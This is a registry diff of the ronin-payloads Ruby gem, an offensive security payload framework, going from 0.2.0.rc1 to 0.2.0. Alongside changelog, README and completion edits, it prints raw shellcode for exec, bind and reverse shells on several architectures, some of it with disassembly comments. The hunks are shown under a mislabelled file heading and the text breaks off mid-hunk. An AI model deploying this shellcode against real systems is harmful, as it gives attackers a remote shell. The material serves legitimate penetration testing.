ronin-payloads 0.2.0.rc1 → 0.2.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/.rubocop.yml +3 -0
- data/.ruby-version +1 -1
- data/ChangeLog.md +8 -1
- data/README.md +17 -10
- data/data/completions/ronin-payloads +33 -33
- data/gemspec.yml +1 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +13 -12
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +15 -14
- data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +11 -10
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +13 -12
- data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +21 -20
- data/lib/ronin/payloads/builtin/test/cmd.rb +1 -1
- data/lib/ronin/payloads/builtin/test/open_redirect.rb +4 -1
- data/lib/ronin/payloads/builtin/test/url.rb +1 -1
- data/lib/ronin/payloads/builtin/test/xss.rb +4 -1
- data/lib/ronin/payloads/cli.rb +2 -0
- data/lib/ronin/payloads/version.rb +1 -1
- metadata +5 -5
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 652a98c495b84d3a9c198fb5c9c7a2cde8fe6b2d55439e6a62cb6b8e39c56e35
|
4
|
+
data.tar.gz: 03f33b7a86f0990b27d1e5f72a08222b3da758f20c275a9b78251aec24289ccd
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: f24494cee6f75c9d3fc56a5ff006d4c1923420cd7129707ad1eb88e01c2c9ce92a7739cbc4aab0010291a771589b8e90098fc6a9647ab340fe6071c30bfed863
|
7
|
+
data.tar.gz: f455db818586a0c15148ecc318bded23a0295fca56faf56d5f01dfd74798ede1c358bff28f033d77f4b38cb7710f3477b8a4c6d9283d1206a7b76d5e49bafc69
|
data/.rubocop.yml
CHANGED
data/.ruby-version
CHANGED
@@ -1 +1 @@
|
|
1
|
-
ruby-3.
|
1
|
+
ruby-3.3
|
data/ChangeLog.md
CHANGED
@@ -1,4 +1,4 @@
|
|
1
|
-
### 0.2.0 / 2024-
|
1
|
+
### 0.2.0 / 2024-07-22
|
2
2
|
|
3
3
|
* Added the {Ronin::Payloads::GroovyPayload} payload class.
|
4
4
|
* Added the {Ronin::Payloads::NashornPayload} payload class.
|
@@ -43,6 +43,13 @@
|
|
43
43
|
`ronin-payloads build` command for the given payload.
|
44
44
|
* Renamed the `-e` option flag to `-E` in `ronin-payloads build`.
|
45
45
|
|
46
|
+
### 0.1.6 / 2024-07-01
|
47
|
+
|
48
|
+
#### Payloads
|
49
|
+
|
50
|
+
* Fixed `incompatible character encodings: UTF-8 and ASCII-8BIT` exceptions when
|
51
|
+
building shellcode payloads with certain IP addresses or port numbers.
|
52
|
+
|
46
53
|
### 0.1.5 / 2024-06-19
|
47
54
|
|
48
55
|
* Fixed order of arguments passed to `TCPServer.new` in
|
data/README.md
CHANGED
@@ -126,13 +126,17 @@ $ ronin-payloads list
|
|
126
126
|
cmd/awk/reverse_shell
|
127
127
|
cmd/bash/reverse_shell
|
128
128
|
cmd/lua/reverse_shell
|
129
|
+
cmd/netcat/bind_shell
|
129
130
|
cmd/node/reverse_shell
|
130
131
|
cmd/openssl/reverse_shell
|
131
132
|
cmd/perl/reverse_shell
|
132
133
|
cmd/php/reverse_shell
|
134
|
+
cmd/ping
|
133
135
|
cmd/powershell/reverse_shell
|
134
136
|
cmd/python/reverse_shell
|
135
137
|
cmd/ruby/reverse_shell
|
138
|
+
cmd/sleep
|
139
|
+
cmd/touch
|
136
140
|
cmd/windows/download
|
137
141
|
cmd/zsh/reverse_shell
|
138
142
|
groovy/reverse_shell
|
@@ -142,31 +146,33 @@ $ ronin-payloads list
|
|
142
146
|
php/cmd_exec
|
143
147
|
php/download_exec
|
144
148
|
shellcode/freebsd/x86/bind_shell
|
145
|
-
shellcode/freebsd/x86/
|
149
|
+
shellcode/freebsd/x86/exec_shell
|
146
150
|
shellcode/freebsd/x86/reverse_shell
|
147
|
-
shellcode/freebsd/x86_64/
|
151
|
+
shellcode/freebsd/x86_64/exec_shell
|
148
152
|
shellcode/linux/arm/bind_shell
|
149
|
-
shellcode/linux/arm/
|
153
|
+
shellcode/linux/arm/exec_shell
|
150
154
|
shellcode/linux/arm/reverse_shell
|
151
155
|
shellcode/linux/mips/bind_shell
|
152
|
-
shellcode/linux/mips/
|
156
|
+
shellcode/linux/mips/exec_shell
|
153
157
|
shellcode/linux/mips/reverse_shell
|
154
|
-
shellcode/linux/ppc/
|
158
|
+
shellcode/linux/ppc/exec_shell
|
155
159
|
shellcode/linux/ppc/reverse_shell
|
156
160
|
shellcode/linux/x86/bind_shell
|
157
|
-
shellcode/linux/x86/
|
161
|
+
shellcode/linux/x86/exec_shell
|
158
162
|
shellcode/linux/x86/reverse_shell
|
159
163
|
shellcode/linux/x86_64/bind_shell
|
160
|
-
shellcode/linux/x86_64/
|
164
|
+
shellcode/linux/x86_64/exec_shell
|
161
165
|
shellcode/linux/x86_64/reverse_shell
|
162
|
-
shellcode/macos/x86_64/
|
166
|
+
shellcode/macos/x86_64/exec_shell
|
163
167
|
shellcode/macos/x86_64/reverse_shell
|
164
|
-
shellcode/netbsd/x86/
|
168
|
+
shellcode/netbsd/x86/exec_shell
|
165
169
|
shellcode/netbsd/x86/reverse_shell
|
166
170
|
shellcode/openbsd/x86/bind_shell
|
167
|
-
shellcode/openbsd/x86/
|
171
|
+
shellcode/openbsd/x86/exec_shell
|
168
172
|
shellcode/windows/x86_64/cmd
|
173
|
+
test/cmd
|
169
174
|
test/open_redirect
|
175
|
+
test/url
|
170
176
|
test/xss
|
171
177
|
```
|
172
178
|
|
@@ -234,6 +240,7 @@ $ git push
|
|
234
240
|
Define a `/bin/sh` shellcode payload:
|
235
241
|
|
236
242
|
```ruby
|
243
|
+
# encoding: ASCII-8BIT
|
237
244
|
require 'ronin/payloads/shellcode_payload'
|
238
245
|
|
239
246
|
module Ronin
|
@@ -11,7 +11,7 @@ _ronin-payloads_completions_filter() {
|
|
11
11
|
|
12
12
|
if [[ "${cur:0:1}" == "-" ]]; then
|
13
13
|
echo "$words"
|
14
|
-
|
14
|
+
|
15
15
|
else
|
16
16
|
for word in $words; do
|
17
17
|
[[ "${word:0:1}" != "-" ]] && result+=("$word")
|
@@ -29,99 +29,99 @@ _ronin-payloads_completions() {
|
|
29
29
|
|
30
30
|
case "$compline" in
|
31
31
|
'encode'*'--encoder')
|
32
|
-
while read -r; do COMPREPLY+=(
|
32
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
33
33
|
;;
|
34
34
|
|
35
35
|
'build'*'--encoder')
|
36
|
-
while read -r; do COMPREPLY+=(
|
36
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
37
37
|
;;
|
38
38
|
|
39
39
|
'build'*'--output')
|
40
|
-
while read -r; do COMPREPLY+=(
|
40
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
41
41
|
;;
|
42
42
|
|
43
43
|
'encoder'*'--file')
|
44
|
-
while read -r; do COMPREPLY+=(
|
44
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
45
45
|
;;
|
46
46
|
|
47
47
|
'launch'*'--file')
|
48
|
-
while read -r; do COMPREPLY+=(
|
48
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
49
49
|
;;
|
50
50
|
|
51
51
|
'build'*'--file')
|
52
|
-
while read -r; do COMPREPLY+=(
|
52
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
53
53
|
;;
|
54
54
|
|
55
55
|
'show'*'--file')
|
56
|
-
while read -r; do COMPREPLY+=(
|
56
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
57
57
|
;;
|
58
58
|
|
59
59
|
'completion'*)
|
60
|
-
while read -r; do COMPREPLY+=(
|
60
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--print --install --uninstall")" -- "$cur")
|
61
61
|
;;
|
62
62
|
|
63
63
|
'encoder'*'-f')
|
64
|
-
while read -r; do COMPREPLY+=(
|
64
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
65
65
|
;;
|
66
66
|
|
67
|
-
'
|
68
|
-
while read -r; do COMPREPLY+=(
|
67
|
+
'encode'*'-E')
|
68
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
69
69
|
;;
|
70
70
|
|
71
|
-
'
|
72
|
-
while read -r; do COMPREPLY+=(
|
71
|
+
'launch'*'-f')
|
72
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
73
73
|
;;
|
74
74
|
|
75
|
-
'build'*'-
|
76
|
-
while read -r; do COMPREPLY+=(
|
75
|
+
'build'*'-E')
|
76
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
77
77
|
;;
|
78
78
|
|
79
79
|
'build'*'-o')
|
80
|
-
while read -r; do COMPREPLY+=(
|
80
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
81
81
|
;;
|
82
82
|
|
83
|
-
'build'*'-
|
84
|
-
while read -r; do COMPREPLY+=(
|
83
|
+
'build'*'-f')
|
84
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
85
85
|
;;
|
86
86
|
|
87
87
|
'encoder'*)
|
88
|
-
while read -r; do COMPREPLY+=(
|
88
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--verbose -v --file -f $(ronin-payloads encoders)")" -- "$cur")
|
89
89
|
;;
|
90
90
|
|
91
91
|
'show'*'-f')
|
92
|
-
while read -r; do COMPREPLY+=(
|
92
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
93
93
|
;;
|
94
94
|
|
95
|
-
'
|
96
|
-
while read -r; do COMPREPLY+=(
|
95
|
+
'launch'*)
|
96
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--file -f --param -p --debug -D $(ronin-payloads list)")" -- "$cur")
|
97
97
|
;;
|
98
98
|
|
99
|
-
'
|
100
|
-
while read -r; do COMPREPLY+=(
|
99
|
+
'encode'*)
|
100
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--format -F --encoder -E --param -p --string -s")" -- "$cur")
|
101
101
|
;;
|
102
102
|
|
103
103
|
'build'*)
|
104
|
-
while read -r; do COMPREPLY+=(
|
104
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--file -f --format -F --param -p --output -o --encoder -E --encoder-param --debug -D $(ronin-payloads list)")" -- "$cur")
|
105
105
|
;;
|
106
106
|
|
107
|
-
'
|
108
|
-
while read -r; do COMPREPLY+=(
|
107
|
+
'info'*)
|
108
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads list)")" -- "$cur")
|
109
109
|
;;
|
110
110
|
|
111
|
-
'
|
112
|
-
while read -r; do COMPREPLY+=(
|
111
|
+
'show'*)
|
112
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--file -f --verbose -v $(ronin-payloads list)")" -- "$cur")
|
113
113
|
;;
|
114
114
|
|
115
115
|
'new'*)
|
116
|
-
while read -r; do COMPREPLY+=(
|
116
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--type -t --author -a --author-email -e --summary -S --description -D --reference -R")" -- "$cur")
|
117
117
|
;;
|
118
118
|
|
119
119
|
*)
|
120
|
-
while read -r; do COMPREPLY+=(
|
120
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--version -V help build completion encode encoder encoders irb launch list new show ls info")" -- "$cur")
|
121
121
|
;;
|
122
122
|
|
123
123
|
esac
|
124
124
|
} &&
|
125
|
-
complete -F _ronin-payloads_completions ronin-payloads
|
125
|
+
complete -F _ronin-payloads_completions ronin-payloads
|
126
126
|
|
127
127
|
# ex: filetype=sh
|
data/gemspec.yml
CHANGED
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -58,7 +59,7 @@ module Ronin
|
|
58
59
|
"\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff" \
|
59
60
|
"\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01" \
|
60
61
|
"\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff" \
|
61
|
-
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
|
62
|
+
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
|
62
63
|
end
|
63
64
|
|
64
65
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -53,7 +54,7 @@ module Ronin
|
|
53
54
|
def build
|
54
55
|
@payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" \
|
55
56
|
"\x68\x2f\x62\x69\x6e\x89\xe3\x50" \
|
56
|
-
"\x54\x53\xb0\x3b\x50\xcd\x80"
|
57
|
+
"\x54\x53\xb0\x3b\x50\xcd\x80"
|
57
58
|
end
|
58
59
|
|
59
60
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -56,7 +57,7 @@ module Ronin
|
|
56
57
|
"\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" \
|
57
58
|
"\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" \
|
58
59
|
"\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" \
|
59
|
-
"\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
|
60
|
+
"\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
|
60
61
|
end
|
61
62
|
|
62
63
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -53,7 +54,7 @@ module Ronin
|
|
53
54
|
def build
|
54
55
|
@payload = "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" \
|
55
56
|
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" \
|
56
|
-
"\x54\x5f\x52\x57\x54\x5e\x0f\x05"
|
57
|
+
"\x54\x5f\x52\x57\x54\x5e\x0f\x05"
|
57
58
|
end
|
58
59
|
|
59
60
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -119,7 +120,7 @@ module Ronin
|
|
119
120
|
"\x08\x00\x8d\xe2" \
|
120
121
|
"\x00\x10\x8d\xe2" \
|
121
122
|
"\x04\x20\x8d\xe2" \
|
122
|
-
"\x0b\x00\x90\xef"
|
123
|
+
"\x0b\x00\x90\xef"
|
123
124
|
end
|
124
125
|
|
125
126
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -60,7 +61,7 @@ module Ronin
|
|
60
61
|
"\xc2\x51\x03\x37" \
|
61
62
|
"\x01\xdf\x2f\x62" \
|
62
63
|
"\x69\x6e\x2f\x2f" \
|
63
|
-
"\x73\x68"
|
64
|
+
"\x73\x68"
|
64
65
|
end
|
65
66
|
|
66
67
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -72,7 +73,7 @@ module Ronin
|
|
72
73
|
"#{packed_port}" \
|
73
74
|
"#{packed_ipv4}" \
|
74
75
|
\
|
75
|
-
"/bin/sh\0"
|
76
|
+
"/bin/sh\0"
|
76
77
|
end
|
77
78
|
|
78
79
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -118,7 +119,7 @@ module Ronin
|
|
118
119
|
"\xf0\xff\xa5\x23" \
|
119
120
|
"\xab\x0f\x02\x24" \
|
120
121
|
"\x0c\x01\x01\x01" \
|
121
|
-
"/bin/sh"
|
122
|
+
"/bin/sh"
|
122
123
|
end
|
123
124
|
|
124
125
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -51,18 +52,18 @@ module Ronin
|
|
51
52
|
# Builds the shellcode.
|
52
53
|
#
|
53
54
|
def build
|
54
|
-
@payload = "\x28\x06\xff\xff"
|
55
|
-
"\x3c\x0f\x2f\x2f"
|
56
|
-
"\x35\xef\x62\x69"
|
57
|
-
"\xaf\xaf\xff\xf4"
|
58
|
-
"\x3c\x0e\x6e\x2f"
|
59
|
-
"\x35\xce\x73\x68"
|
60
|
-
"\xaf\xae\xff\xf8"
|
61
|
-
"\xaf\xa0\xff\xfc"
|
62
|
-
"\x27\xa4\xff\xf4"
|
63
|
-
"\x28\x05\xff\xff"
|
64
|
-
"\x24\x02\x0f\xab"
|
65
|
-
"\x01\x01\x01\x0c"
|
55
|
+
@payload = "\x28\x06\xff\xff" + # slti a2,zero,-1
|
56
|
+
"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f
|
57
|
+
"\x35\xef\x62\x69" + # ori t7,t7,0x6269
|
58
|
+
"\xaf\xaf\xff\xf4" + # sw t7,-12(sp)
|
59
|
+
"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f
|
60
|
+
"\x35\xce\x73\x68" + # ori t6,t6,0x7368
|
61
|
+
"\xaf\xae\xff\xf8" + # sw t6,-8(sp)
|
62
|
+
"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
|
63
|
+
"\x27\xa4\xff\xf4" + # addiu a0,sp,-12
|
64
|
+
"\x28\x05\xff\xff" + # slti a1,zero,-1
|
65
|
+
"\x24\x02\x0f\xab" + # li v0,4011
|
66
|
+
"\x01\x01\x01\x0c" # syscall 0x40404
|
66
67
|
end
|
67
68
|
|
68
69
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -100,7 +101,7 @@ module Ronin
|
|
100
101
|
"\x27\xa4\xff\xf4" \
|
101
102
|
"\x28\x05\xff\xff" \
|
102
103
|
"\x24\x02\x0f\xab" \
|
103
|
-
"\x01\x01\x01\x0c"
|
104
|
+
"\x01\x01\x01\x0c"
|
104
105
|
end
|
105
106
|
|
106
107
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -51,20 +52,20 @@ module Ronin
|
|
51
52
|
# Builds the shellcode.
|
52
53
|
#
|
53
54
|
def build
|
54
|
-
@payload = "\x7c\x3f\x0b\x78"
|
55
|
-
"\x7c\xa5\x2a\x79"
|
56
|
-
"\x42\x40\xff\xf9"
|
57
|
-
"\x7f\x08\x02\xa6"
|
58
|
-
"\x3b\x18\x01\x34"
|
59
|
-
"\x98\xb8\xfe\xfb"
|
60
|
-
"\x38\x78\xfe\xf4"
|
61
|
-
"\x90\x61\xff\xf8"
|
62
|
-
"\x38\x81\xff\xf8"
|
63
|
-
"\x90\xa1\xff\xfc"
|
64
|
-
"\x3b\xc0\x01\x60"
|
65
|
-
"\x7f\xc0\x2e\x70"
|
66
|
-
"\x44\xde\xad\xf2"
|
67
|
-
"/bin/shZ"
|
55
|
+
@payload = "\x7c\x3f\x0b\x78" + # mr r31,r1
|
56
|
+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5
|
57
|
+
"\x42\x40\xff\xf9" + # bdzl+ 10000454< main>
|
58
|
+
"\x7f\x08\x02\xa6" + # mflr r24
|
59
|
+
"\x3b\x18\x01\x34" + # addi r24,r24,308
|
60
|
+
"\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
|
61
|
+
"\x38\x78\xfe\xf4" + # addi r3,r24,-268
|
62
|
+
"\x90\x61\xff\xf8" + # stw r3,-8(r1)
|
63
|
+
"\x38\x81\xff\xf8" + # addi r4,r1,-8
|
64
|
+
"\x90\xa1\xff\xfc" + # stw r5,-4(r1)
|
65
|
+
"\x3b\xc0\x01\x60" + # li r30,352
|
66
|
+
"\x7f\xc0\x2e\x70" + # srawi r0,r30,5
|
67
|
+
"\x44\xde\xad\xf2" + # .long 0x44deadf2
|
68
|
+
"/bin/shZ" # the last byte becomes NULL
|
68
69
|
end
|
69
70
|
|
70
71
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -125,7 +126,7 @@ module Ronin
|
|
125
126
|
"\x3b\xc0\x01\x60" \
|
126
127
|
"\x7f\xc0\x2e\x70" \
|
127
128
|
"\x44\xde\xad\xf2" \
|
128
|
-
"/bin/shZ"
|
129
|
+
"/bin/shZ"
|
129
130
|
end
|
130
131
|
|
131
132
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -98,7 +99,7 @@ module Ronin
|
|
98
99
|
"\x68\x2f\x62\x69\x6e" \
|
99
100
|
"\x89\xe3" \
|
100
101
|
"\xb0\x0b" \
|
101
|
-
"\xcd\x80"
|
102
|
+
"\xcd\x80"
|
102
103
|
end
|
103
104
|
|
104
105
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -54,7 +55,7 @@ module Ronin
|
|
54
55
|
def build
|
55
56
|
@payload = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" \
|
56
57
|
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" \
|
57
|
-
"\x80"
|
58
|
+
"\x80"
|
58
59
|
end
|
59
60
|
|
60
61
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -62,7 +63,7 @@ module Ronin
|
|
62
63
|
"\xc0\x52\x68\x6e\x2f\x73\x68\x68" \
|
63
64
|
"\x2f\x2f\x62\x69\x89\xe3\x52\x53" \
|
64
65
|
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" \
|
65
|
-
"\x80"
|
66
|
+
"\x80"
|
66
67
|
end
|
67
68
|
|
68
69
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -59,7 +60,7 @@ module Ronin
|
|
59
60
|
"\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" \
|
60
61
|
"\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" \
|
61
62
|
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" \
|
62
|
-
"\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
|
63
|
+
"\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
|
63
64
|
end
|
64
65
|
|
65
66
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -51,16 +52,16 @@ module Ronin
|
|
51
52
|
# Builds the shellcode.
|
52
53
|
#
|
53
54
|
def build
|
54
|
-
@payload = "\x48\x31\xd2"
|
55
|
-
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
|
56
|
-
"\x48\xc1\xeb\x08"
|
57
|
-
"\x53"
|
58
|
-
"\x48\x89\xe7"
|
59
|
-
"\x50"
|
60
|
-
"\x57"
|
61
|
-
"\x48\x89\xe6"
|
62
|
-
"\xb0\x3b"
|
63
|
-
"\x0f\x05"
|
55
|
+
@payload = "\x48\x31\xd2" + # xor %rdx, %rdx
|
56
|
+
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" + # mov $0x68732f6e69622f2f, %rbx
|
57
|
+
"\x48\xc1\xeb\x08" + # shr $0x8, %rbx
|
58
|
+
"\x53" + # push %rbx
|
59
|
+
"\x48\x89\xe7" + # mov %rsp, %rdi
|
60
|
+
"\x50" + # push %rax
|
61
|
+
"\x57" + # push %rdi
|
62
|
+
"\x48\x89\xe6" + # mov %rsp, %rsi
|
63
|
+
"\xb0\x3b" + # mov $0x3b, %al
|
64
|
+
"\x0f\x05" # syscall
|
64
65
|
end
|
65
66
|
|
66
67
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -58,7 +59,7 @@ module Ronin
|
|
58
59
|
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" \
|
59
60
|
